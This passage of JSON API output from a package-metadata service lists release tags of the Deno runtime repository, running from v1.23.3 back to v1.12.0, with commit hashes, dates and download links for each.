.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyst